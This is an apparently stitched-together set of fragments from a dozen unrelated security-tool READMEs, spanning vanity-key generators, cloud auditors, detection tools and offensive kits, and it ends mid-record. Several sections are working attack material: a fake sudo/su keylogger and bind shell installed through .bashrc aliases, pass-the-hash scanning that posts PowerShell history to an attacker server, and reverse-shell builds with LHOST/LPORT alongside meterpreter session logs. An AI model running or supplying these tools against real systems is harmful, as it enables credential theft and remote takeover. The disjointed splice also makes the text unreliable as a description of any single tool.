• Why generate GPG keys?
  Scallion was used to find collisions for every 32bit key id in the Web of Trust's strong set demonstrating how insecure 32bit key ids are. There was/is a talk at DEFCON (video) and additional info can be found at https://evil32.com/.
  
• What are valid characters?
  Tor .onion addresses use Base32, consisting of all letters and the digits 2 through 7, inclusive. They are case-insensitive.
  GPG fingerprints use hexadecimal, consisting of the digits 0-9 and the letters A-F.
  
• Can you use Bitcoin ASICs (e.g. Jalapeno, KnC) to accelerate this process?
  Sadly, no. While the process Scallion uses is conceptually similar (increment a nonce and check the hash), the details are different (SHA-1 vs double SHA-256 for Bitcoin). Furthermore, Bitcoin ASICs are as fast as they are because they are extremely tailored to Bitcoin mining applications. For example, here's the datasheet for the CoinCraft A-1, an ASIC that never came out, but is probably indicitive of the general approach. The microcontroller sends work in the form of the final 128-bits of a Bitcoin block, the hash midstate of the previous bits, a target difficulty, and the maximum nonce to try. The ASIC chooses the location to insert the nonce, and it chooses what blocks meet the hash. Scallion has to insert the nonce in a different location, and it checks for a pattern match rather than just "lower than XXXX".
  
• How can you use multiple devices?
  Run multiple Scallion instances. Scallion searches are probabilistic, so you won't be repeating work with the second device. True multi-device support wouldn't be too difficult, but it also wouldn't add much. I've run several scallion instances in tmux or screen with great success. You'll just need to manually abort all the jobs when one finds a pattern (or write a shell script to monitor the output file and kill them all when it sees results).
  

• OpenCL and relevant drivers installed and configured. Refer to your distribution's documentation.
• OpenSSL. For Windows, the prebuilt x86 DLLs are included
• On windows only, VC++ Redistributable 2008

• Get the latest mono for your linux distribution:
  http://www.mono-project.com/download/
  
• Install Common dependencies:
  

  sudo apt-get update
  sudo apt-get install libssl-dev mono-devel

• AMD/OpenSource build sudo apt-get install ocl-icd-opencl-dev
  
• Nvidia build sudo apt-get install nvidia-opencl-dev nvidia-opencl-icd
  
• Finally msbuild scallion.sln
  

1. Have the nvidia-docker container runtime
   
2. Build the container:
   

   docker build -t scallion -f Dockerfile.nvidia .

3. Run:
   

   docker run --runtime=nvidia -ti --rm scallion -l

   screenshot of expected output
   

1. Open 'scallion.sln' in VS Express for Desktop 2012
2. Build the solution, I did everything in debug mode.

$ mono scallion/bin/Debug/scallion.exe -l

$ mono scallion/bin/Debug/scallion.exe -d 0 prefix
Cooking up some delicious scallions...
Using kernel optimized from file kernel.cl (Optimized4)
Using work group size 128
Compiling kernel... done.
Testing SHA1 hash...
CPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
GPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
Looks good!
LoopIteration:40  HashCount:671.09MH  Speed:9.5MH/s  Runtime:00:01:10  Predicted:00:00:56  Found new key! Found 1 unique keys.
<XmlMatchOutput>
<GeneratedDate>2014-08-05T07:14:50.329955Z</GeneratedDate>
<Hash>prefix64kxpwmzdz.onion</Hash>
<PrivateKey>-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCmYmTnwGOCpsPOqvs5mZQbIM1TTqOHK1r6zGvpk61ZaT7z2BCE
FPvdTdkZ4tQ3/95ufjhPx7EVDjeJ/JUbT0QAW/YflzUfFJuBli0J2eUJzhhiHpC/
1d3rb6Uhnwvv3xSnfG8m7LeI/Ao3FLtyZFgGZPwsw3BZYyJn3sD1mJIJrQIEB/ZP
ZwKBgCTUQTR4zcz65zSOfo95l3YetVhfmApYcQQd8HTxgTqEsjr00XzW799ioIWt   
vaKMCtJlkWLz4N1EqflOH3WnXsEkNA5AVFe1FTirijuaH7e46fuaPJWhaSq1qERT
eQT1jY2jytnsJT0VR7e2F83FKINjLeccnkkiVknsjrOPrzkXAkEA0Ky+vQdEj64e
iP4Rxc1NreB7oKor40+w7XSA0hyLA3JQjaHcseg/bqYxPZ5J4JkCNmjavGdM1v6E
OsVVaMWQ7QJBAMweWSWtLp6rVOvTcjZg+l5+D2NH+KbhHbNLBcSDIvHNmD9RzGM1
Xvt+rR0FA0wUDelcdJt0R29v2t19k2IBA8ECQFMDRoOQ+GBSoDUs7PUWdcXtM7Nt
QW350QEJ1hBJkG2SqyNJuepH4PIktjfytgcwQi9w7iFafyxcAAEYgj4HZw8CQAUI
3xXEA2yZf9/wYax6/Gm67cpKc3sgKVczFxsHhzEml6hi5u0FG7aNs7jQTRMW0aVF
P8Ecx3l7iZ6TeakqGhcCQGdhCaEb7bybAmwQ520omqfHWSte2Wyh+sWZXNy49EBg
d1mBig/w54sOBCUHjfkO9gyiANP/uBbR6k/bnmF4dMc=
-----END RSA PRIVATE KEY-----
</PrivateKey>
<PublicModulusBytes>pmJk58BjgqbDzqr7OZmUGyDNU06jhyta+sxr6ZOtWWk+89gQhBT73U3ZGeLUN//ebn44T8exFQ43ifyVG09EAFv2H5c1HxSbgZYtCdnlCc4YYh6Qv9Xd62+lIZ8L798Up3xvJuy3iPwKNxS7cmRYBmT8LMNwWWMiZ97A9ZiSCa0=</PublicModulusBytes>
<PublicExponentBytes>B/ZPZw==</PublicExponentBytes>
</XmlMatchOutput>
ini   t: 491ms / 1 (491ms, 2.04/s)
generate key: 1193ms / 6 (198.83ms, 5.03/s)
cpu precompute: 10ms / 6 (1.67ms, 600/s)
total without init: 70640ms / 1 (70640ms, 0.01/s)
set buffers: 0ms / 40 (0ms, 0/s)
write buffers: 3ms / 40 (0.08ms, 13333.33/s)
read results: 67442ms / 40 (1686.05ms, 0.59/s)
check results: 185ms / 40 (4.63ms, 216.22/s)

9.50 million hashes per second

Stopping the GPU and shutting down...

• Generate a prefix followed by a number for better readability:
  

    mono scallion.exe prefix[234567]

• Search for several patterns at once (n.b. -c causes scallion to continue generating even once it gets a hit)
  

    mono scallion.exe -c prefix scallion hashes
    mono scallion.exe -c "prefix|scallion|hashes"

• Search for the suffix "badbeef"
  

    mono scallion.exe .........badbeef
    mono scallion.exe --gpg badbeef$ # Generate GPG key

• Complicated self explanatory example:
  

    mono scallion.exe "suffixa$|suffixb$|prefixa|prefixb|a.suffix$|a.test.$"

1. Generate RSA key using OpenSSL on the CPU
2. Send the key to the GPU
3. Increase the key's public exponent
4. Hash the key
5. If the hashed key is not a partial collision go to step 3
6. If the key does not pass the sanity checks recommended by PKCS #1 v2.1 (checked on the CPU) go to step 3
7. Brand new key with partial collision!

• Scallion is based in part on shallot and inspired by vanitygen
• The OpenCL SHA-1 implementation was adapted from NearSHA
• Includes components from OpenTK and OpenSSL-net

iam:GenerateCredentialReport
iam:GetCredentialReport
iam:GetAccountAuthorizationDetails
iam:ListUsers
iam:GetUser
iam:ListGroups
iam:ListRoles
iam:GetRole
iam:GetPolicy
iam:GetAccountPasswordPolicy
iam:GetAccountSummary
iam:ListAccountAliases
organizations:ListAccountsForParent
organizations:ListOrganizationalUnitsForParent
organizations:DescribeOrganization
organizations:ListRoots
organizations:ListAccounts
organizations:ListTagsForResource
organizations:ListPolicies
organizations:ListTargetsForPolicy
organizations:DescribePolicy
organizations:ListAWSServiceAccessForOrganization

./Aaia_aws_collector.sh <profile_name>

python Aaia.py -n <profile_name> -a load_data

python Aaia.py -n all -m iam_sample_audit

• Cloudmapper
• Cartography
• BloodHound

• Write a detailed documentation for understanding Aaia's Neo4j DB Schema
• Write a detailed documentation for developing custom modules for Aaia
• Write custom modules to evaluate 28 AWS privelege escalation methods identified by RhinoSecurity.
• Provide a cheatsheet of queries for identifying simple issues in AWS IAM
• Extend Aaia to other cloud providers.

• have GPMC/RSAT/whatever installed on a domain-joined computer
  
• generate an xml report with the Get-GPOReport PowerShell cmdlet
  
• feed the report to Grouper
  
• a bunch of gibberish falls out and hopefully there's some good stuff in there.
  

• better file permission checks that don't involve writing to disk.
• doesn't miss those GPP passwords that Grouper 1 did.
• HTML output option so you can preserve those sexy console colours and take them with you.
• aim Grouper2 at an offline copy of SYSVOL if you want.
• it's multithreaded!
• a bunch of other great stuff but it's late and I'm tired.

• Get dev branch functioning at least as well as master does.
  • If you want to help with this, look at issues tagged 'dev'.
• Finish basic unit tests of assessment and interest-level code blocks.
• Bring the big refactor over to master.
• Start actually working on the other issues and features and whatnot.

• Huge thanks to Sh3r4 for all her help, I have no idea how to write code and it would show way worse without her.
• Much assistance and code cleanup from @liamosaur
• SDDL parsing from https://github.com/zacateras/
• Thanks to @skorov8 for providing some useful registry key data.

• Go to http://my.telegram.org and log in.
• Click on API development tools and fill the required fields.
• put app name you want & select other in platform Example :
• copy "api_id" & "api_hash" after clicking create app ( will be used in setup.py )

• Install requierments

• setup configration file ( apiID, apiHASH )

• To Genrate User Data

• ( members.csv is default if you changed name use it )
• Send Bulk sms To Collected Data

• add users to your group ( in devlopment )

• Update Tool

• tld
• requests

• Pre-domain bypass
• Post-domain bypass
• Backtick bypass
• Null origin bypass
• Unescaped dot bypass
• Invalid value
• Wild card value
• Origin reflection test
• Third party allowance test
• HTTP allowance test

• tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries.
  
• tas_forkpty: Is the same as forkpty, but it fills a custom structure, check forkpty man page for more details.
  
• tas_tty_loop: here is where the manipulation of the tty happen, you can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output. (see leet-shell).
  

Note: fakesudo only changes the command if the user runs sudo cmd [args], if some additional flags are used, then the command isn't touched.

Note: fakesu only changes the command if the user runs su or su -, if some additional flags are used, then the command isn't touched.

• add-root-user - creates a root user with password in /etc/passwd.
• bind-shell - listen for incoming connections and spawn a tty shell.
• system - executes a command as root.

$ make
  CC .obj/globals.o
  CC .obj/getinode.o
  CC .obj/tas-execv.o
  CC .obj/tty.o
  CC .obj/xreadlink.o
  AR .obj/libtas.a

$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
  CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'

$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
  CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'

$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc

make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
  CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'

$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc

[test@alfheim tas]$ make fun/leet-shell
  CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!

1. Inspector investigates entities that are appeaered in the alert including IP address, Domain name and store a result: reputation, history of malicious activities, associated cloud instance and etc. Following components are already provided to integrate with your AlertResponder environment. Also you can create own inspector to check logs that is stored into original log storage or log search system.
   • VirusTotalInspector
2. Reviewer receives the alert with result(s) of Inspector and evaluate severity of the alert. Reviewer should be written by each security operator/administrator of your organization because security policies are differ from organazation to organization.
3. Emitter finally receives the alert with result of Reviewer's severity evaluation. After that, Emitter sends external integrated system. E.g. PagerDuty, Slack, Github Enterprise, etc. Also automatic quarantine can be configured by AWS Lambda function.
   • GheReporter

• Pull based correlation analysis
• Alert aggregation
• Pluggable Inspectors and Emitters

• $REGION: Replace it with your AWS region. (e.g. ap-northeast-1)
• $STACK_NAME: Replace it with CloudFormation stack name

$ curl -o alert_responder.yml https://s3-$REGION.amazonaws.com/cfn-assets.$REGION/AlertResponder/templates/latest.yml
$ aws cloudformation deploy --template-file alert_responder.yml --stack-name $STACK_NAME --capabilities CAPABILITY_IAM

• awscli >= 1.16.20
• Go >= 1.11
• GNU automake >= 1.16.1

$ cat config.json
{
  "StackName": "your-alert-responder-name",
  "TestStackName": "your-test-stack-name",
  "CodeS3Bucket": "your-some-bucket",
  "CodeS3Prefix": "for-example-functions",

  "InspectionDelay": "1",
  "ReviewDelay": "10"
}
$ env AR_CONFIG=config.json make deploy

$ cd tester/
$ make AR_CONFIG=../config.json deploy

$ cat params.json
{
  "AccountId": "214219211678",
  "Region": "ap-northeast-1",
  "Inspector": "slam-alert-responder-test-functions-Inspector-1OBGU89CT1P4B",
  "Reporter": "slam-alert-responder-test-functions-Reporter-1NDHU0VDI8OPA"
}

$ go test -v
=== RUN   TestInvokeBySns
--- PASS: TestInvokeBySns (3.39s)
           (snip)
PASS
ok      github.com/m-mizutani/AlertResponder    20.110s

@inproceedings{massarelli2018safe,
  title={SAFE: Self-Attentive Function Embeddings for Binary Similarity},
  author={Massarelli, Luca and Di Luna, Giuseppe Antonio and Petroni, Fabio and Querzoni, Leonardo and Baldoni, Roberto},
  booktitle={Proceedings of 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA)},
  year={2019}
}

• python3
• radare2
• jansson

• docker pull massarelli/yarasafe

• docker run -v {FOLDER_TO_MOUNT}:/home/yarasafe/test -it massarelli/yarasafe bash

• Clone the repository:

git clone https://github.com/lucamassarelli/yarasafe.git

• Install yara dependencies:

sudo apt-get install automake libtool make gcc flex bison 
sudo apt-get install libjansson-dev

• Install radare2 on your system:

git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh

• Install yarasafe dependencies:

cd yarasafe/python_script
pip3 install -r requirements.txt

• Compile:

./bootstrap.sh
./configure
make

• Export environment variable:

export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

• Clone the repository:

git clone https://github.com/lucamassarelli/yarasafe.git

• Install yara dependencies:

brew install automake libtool flex bison 
brew install jansson

• Install radare2 on your system:

git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh

cd yarasafe/python_script
pip3 install -r requirements.txt

• Compile:

./bootstrap.sh
./configure.sh
make

• Export environment variable:

export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

yara {PATH_TO_YARASAFE_REPO}/rules/sample_safe_rule.yar {FILES}

import "safe"

rule example
{
    meta:
        description = "This is just an example"
        threat_level = 3
        in_the_wild = true

    condition:
        safe.similarity("[-0.02724416,0.00640265,0.01138294,-0.07013566,0.00306808,-0.09757628,0.10414989,-0.13555837,-0.07873314,-0.00725415,-0.01418876,-0.05907412,-0.12452127,0.06237456,0.02260636,-0.06013175,0.11689295,-0.00200026,-0.03594812,0.07857288,-0.00288544,0.01148411,0.00891006,0.04702956,0.1205316,0.0079077,-0.07449158,0.00653283,0.15414064,0.13021031,0.01325423,-0.35491243,-0.00992016,-0.21460094,0.0558461,-0.07761839,-0.10909985,-0.05616508,0.01800609,0.06736821,0.00308393,0.04241242,-0.08351246,0.13501632,-0.10729794,-0.10229874,0.00066896,-0.01963937,0.05516102,-0.01612499,-0.09743191,-0.0314435,-0.01470971,-0.00125769,-0.01774654,0.2332938,0.14166495,0.16998142,-0.04843156,-0.08931472,0.13102795,0.14147657,0.02275739,-0.04335862,0.05724025,0.03936686,-0.105   26938,-0.11637416,-0.0112917,0.05484914,-0.06934103,0.2543144,-0.17833991,-0.00828893,0.00174531,-0.03048271,-0.04773486,0.095866,-0.14434388,0.11433239,-0.10749247,0.03952292,0.03988512,-0.11541581,-0.07812429,-0.04978319,0.32052052,-0.0497911,-0.13022986,0.02477266,-0.05968329,0.01724695,0.01577485,-0.0497415,0.24494685,0.00361651,-0.08172874,-0.07473877,-0.01046288,0.02298573]") > 0.95
}

• Install all dependencies
  
• Copy the file libyara/modules/safe.c into your_rep/libyara/modules/safe.c
  
• Copy the folder libyara/include/python into your_rep/libyara/include
  
• At the end of libyara/modules/module_list add ``` MODULE(safe)
  
• Modify libyara/Makefile.am:
  
  • after the line:

  libyara_la_LDFLAGS = -version-number 3:8:1

  • add:

  libyara_la_LDFLAGS += -LPATH_TO_PYTHON3.*_LIB -lpython3.*m -ljansson 

• Compile! `
  

I always had an interest in reverse engineering. A few days ago I wanted to look at some game internals for fun, but it was packed & protected by EAC (EasyAntiCheat). This means its handle were stripped and I was unable to dump the process from Ring3. I decided to try to make a custom driver that would allow me to copy the process memory without using OpenProcess. I knew nothing about Windows kernel, PE file structure, so I spent a lot of time reading articles and forums to make this project.

• Dump any process main module using a kernel driver (both x86 and x64)
• Rebuild PE32/PE64 header and sections
• Works on protected system processes & processes with stripped handles (anti-cheats)

• Run Driver/LoadCapcom.bat as Admin. Don't press any key or close the window yet !
• Run Driver/LoadUnsignedDriver.bat as Admin.
• Press enter in the LoadCapcom cmd to unload the driver.
• Run KsDumperClient.exe.
• Profit !

• https://github.com/not-wlan/drvmap
• https://github.com/Zer0Mem0ry/KernelBhop
• https://github.com/NtQuery/Scylla/
• http://terminus.rewolf.pl/terminus/
• https://www.unknowncheats.me/

• Requires Visual Studio 2017
• Requires Windows Driver Kit (WDK)
• Requires .NET 4.6.1

 Mandatory Options:
     -file         = This is the file that the output will be saved in 
                     temporarily before being remotely read/deleted

 Optional Options:
     -computers    = A list of systems to run this against, separated by commas
        [or]
     -dc           = A domain controller to get a list of domain computers from
     -domain       = The domain to get a list of domain computers from

     SharpStat.exe -file "C:\Users\Public\test.txt" -domain lab.raikia.com -dc lab.raikia.com
     SharpStat.exe -file "C:\Users\Public\test.txt" -computers "wkstn7.lab.raikia.com,wkstn10.lab.raikia.com"

Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems

Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems -ExfilPSReadline

Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -CIDR 192.168.1.0/24

Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -TargetList C:\temp\targetlist.txt -Protocol SMB | Out-File -Encoding Ascii C:\temp\local-admin-systems.txt

Check-LocalAdminHash -TargetSystem 192.168.0.16 -Username Administrator -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -Protocol SMB

Username - The Username for attempting authentication.
PasswordHash - Password hash of the user.
TargetSystem - Single hostname or IP for authentication attempt.
TargetList - A list of hosts to scan one per line
AllSystems - A switch that when enabled utilizes PowerView modules to enumerate all domain systems. This list is then used to check local admin access.
Domain - This is the domain that PowerView will utilize for discovering systems.
UserDomain - This is the user's domain to authenticate to each system with. Don't use this flag if using a local cred instead of domain cred.
Protocol - This is the setting for whether to check the hash using WMI or SMB. Default is 'WMI' but set it to 'SMB' to check that instead.
CIDR - Specify a CIDR form network range such as 192.168.0.0/24
Threads - Defaults to 5 threads. (I've run into some odd issues setting threads more than 15 with some results not coming back.)
ExfilPSReadline - For each s   ystem where auth is successful it runs a PowerShell command to locate PSReadLine console history files (PowerShell command history) and then POSTS them to a web server. See the Readme for server setup. 

• Setup a server wherever you would like the files to be sent. This server must be reachable over HTTP/HTTPS from each system.
  
• Copy the index.php script from this repo and put it in /index.php in the web root (/var/www/html) on your web server.
  
• Make an uploads directory
  

• Modify the permissions of this directory

• Make sure php is installed

• Restart Apache

• In the Check-LocalAdminHash.ps1 script itself scroll down to the "Gen-EncodedUploadScript" function and modify the "$Url" variable right under "$UnencodedCommand". Point it at your web server index.php page. I haven't figured out how to pass the UploadUrl variable into that section of the code that ends up getting encoded and run on target systems so hardcode it for now.

• Windows
• Linux
• Mac OS
• FreeBSD and derivatives

• GOOS : the target OS
• GOARCH : the target architecture
• LHOST : the attacker IP or domain name
• LPORT : the listener port

• depends : generate the server certificate (required for the reverse shell)
• windows32 : builds a windows 32 bits executable (PE 32 bits)
• windows64 : builds a windows 64 bits executable (PE 64 bits)
• linux32 : builds a linux 32 bits executable (ELF 32 bits)
• linux64 : builds a linux 64 bits executable (ELF 64 bits)
• macos32 : builds a mac os 32 bits executable (Mach-O)
• macos64 : builds a mac os 64 bits executable (Mach-O)

• run_shell : drops you an system shell (allowing you, for example, to change directories)
• inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
• meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
• exit : exit gracefully

$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

# Predifined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234

# Predifined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234

$ make macos LHOST=192.168.0.12 LPORT=1234

• socat
• ncat
• openssl server module
• metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

• windows/meterpreter/reverse_tcp
• windows/x64/meterpreter/reverse_tcp
• windows/meterpreter/reverse_http
• windows/x64/meterpreter/reverse_http
• windows/meterpreter/reverse_https
• windows/x64/meterpreter/reverse_https

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.1   6.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

[hershell]> meterpreter https 172.16.122.105:8443

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/   handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

• Better performance, Information needed are collected in kernel stack to avoid additional supplement actions such as traversal of '/proc'; and to enhance the performance of data transportation, data collected is transferred via shared ram instead of netlink.
• Hard to be bypassed, Information collection was powered by specifically designed kernel drive, makes it almost impossible to bypass the detection for malicious software like rootkit, which can deliberately hide themselves.
• Easy to be integrated，The AgentSmith-HIDS was built to integrate with other applications and can be used not only as security tool but also a good monitoring tool, or even a good detector of your assets. The agent is capable of collecting the users, files, processes and internet connections for you, so let's imagine when you integrate it with CMDB, you could get a comprehensive map consists of your network, host, container and business (even dependencies). What if you also have a Database audit tool at hand? The map can be extended to contain the relationship between your DB, DB User, tables, fields, applications, network, host and containers etc. Thinking of the possibility of integration with network intrusion detection system and/or threat intelligence etc., higher traceability could also be achieved. It just never gets old.
• Kernel stack + User stack，AgentSmith-HIDS also provide user stack module, to further extend the functionality when working with kernel stack module.

• Kernel stack module hooks execve, connect, process inject, create file, DNS query, load LKM behaviors via Kprobe，and is also capable of monitoring containers by being compatible with Linux namespace.
• User stack module utilize built in detection functions including queries of User List，Listening ports list，System RPM list，Schedule jobs
• AntiRootkit，From: Tyton ,for now add PROC_FILE_HOOK，SYSCALL_HOOK，LKM_HIDDEN，INTERRUPTS_HOOK feature，but only wark on Kernel > 3.10.
• Cred Change monitoring (sudo/su/sshd except)

• Kernel > 2.6.25
• AntiRootKit > 3.10

• Kernel stack module (LKM) Hook key functions via Kprobe to capture information needed.
• User stack module Collect data capatured by kernel stack module, perform necessary process and send it to Kafka; Keep sending heartbeat packet to server so process integrity can be identitied; Execute commands received from server.
• Agent Server(Optional) Send commands to user stack module and monitoring the status of user stack module.

{
    "uid":"0",
    "data_type":"59",
    "run_path":"/root/AgentSmith-HIDS/agent/target/release",
    "exe":"/usr/bin/ls",
    "argv":"ls --color=auto --indicator-style=classify ",
    "pid":"6265",
    "ppid":"1941",
    "pgid":"6265",
    "tgid":"6265",
    "comm":"fish",
    "nodename":"test",
    "stdin":"/dev/pts/0",
    "stdout":"/dev/pts/0",
    "sessionid":"1",
    "user":"root",
    "time":"1575721900051",
    "local_ip":"192.168.165.153",
    "hostname":"test",
    "exe_md5":"a0c32dd6d3bc4d364380e2e65fe9ac64"
}

{
    "uid":"0",
    "data_type":"42",
    "sa_family":"4",
    "fd":"4",
    "dport":"1025",
    "dip":"180.101.49.11",
    "exe":"/usr/bin/ping",
    "pid":"6294",
    "ppid":"1941",
    "pgid":"6294",
    "tgid":"6294",
    "comm":"ping",
    "nodename":"test",
    "sip":"192.168.165.153",
    "sport":"45524",
    "res":"0",
    "sessionid":"1",
    "user":"root",
    "time":"1575721921240",
    "local_ip":"192.168.165.153",
    "hostname":"test",
    "exe_md5":"735ae70b4ceb8707acc40bc5a3d06e04"
}

{
    "uid":"0",
    "data_type":"601",
    "sa_family":"4",
    "fd":"4",
    "sport":"53",
    "sip":"192.168.165.2",
    "exe":"/usr/bin/ping",
    "pid":"6294",
    "ppid":"1941",
    "pgid":"6294",
    "tgid":"6294",
    "comm":"ping",
    "nodename":"test",
    "dip":"192.168.165.153",
    "dport":"53178",
    "qr":"1",
    "opcode":"0",
    "rcode":"0",
    "query":"www.baidu.com",
    "sessionid":"1",
    "user":"root",
    "time":"1575721921240",
    "local_ip":"192.168.165.153",
    "hostname":"test",
    "exe_md5":"39c45487a85e26ce5755a893f7e88293"
}

{
    "uid":"0",
    "data_type":"602",
    "exe":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java",
    "file_path":"/tmp/kafka-logs/replication-offset-checkpoint.tmp",
    "pid":"3341",
    "ppid":"1",
    "pgid":"2657",
    "tgid":"2659",
    "comm":"kafka-scheduler",
    "nodename":"test",
    "sessionid":"3",
    "user":"root",
    "time":"1575721984257",
    "local_ip":"192.168.165.153",
    "hostname":"test",
    "exe_md5":"215be70a38c3a2e14e09d637c85d5311",
    "create_file_md5":"d41d8cd98f00b204e9800998ecf8427e"
}

{
    "uid":"0",
    "data_type":"101",
    "ptrace_request":"4",
    "target_pid":"7402",
    "addr":"00007ffe13011ee6",
    "data":"-a",
    "exe":"/root/ptrace/ptrace",
    "pid":"7401",
    "ppid":"1941",
    "pgid":"7401",
    "tgid":"7401",
    "comm":"ptrace",
    "nodename":"test",
    "sessionid":"1",
    "user":"root",
    "time":"1575722717065",
    "local_ip":"192.168.165.153",
    "hostname":"test",
    "exe_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

{
    "uid":"0",
    "data_type":"603",
    "exe":"/usr/bin/kmod",
    "lkm_file":"/root/ptrace/ptrace",
    "pid":"29461",
    "ppid":"9766",
    "pgid":"29461",
    "tgid":"29461",
    "comm":"insmod",
    "nodename":"test",
    "sessionid":"13",
    "user":"root",
    "time":"1577212873791",
    "local_ip":"192.168.165.152",
    "hostname":"test",
    "exe_md5":"0010433ab9105d666b044779f36d6d1e",
    "load_file_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

{
    "uid":"0",
    "data_type":"604",
    "exe":"/tmp/tt",
    "pid":"27737",
    "ppid":"26865",
    "pgid":"27737",
    "tgid":"27737",
    "comm":"tt",
    "old_uid":"1000",
    "nodename":"test",
    "sessionid":"42",
    "user":"root",
    "time":"1578396197131",
    "local_ip":"192.168.165.152",
    "hostname":"test",
    "exe_md5":"d99a695d2dc4b5099383f30964689c55"
}

{
    "uid":"-1",
    "data_type":"700",
    "module_name":"autoipv6",
    "hidden":"0",
    "time":"1578384987766",
    "local_ip":"192.168.165.152",
    "hostname":"test"
}

{
    "uid":"-1",
    "data_type":"701",
    "module_name":"diamorphine",
    "hidden":"1",
    "syscall_number":"78",
    "time":"1578384927606",
    "local_ip":"192.168.165.152",
    "hostname":"test"
}

{
    "uid":"-1",
    "data_type":"702",
    "module_name":"diamorphine",
    "hidden":"1",
    "time":"1578384927606",
    "local_ip":"192.168.165.152",
    "hostname":"test"
}

{
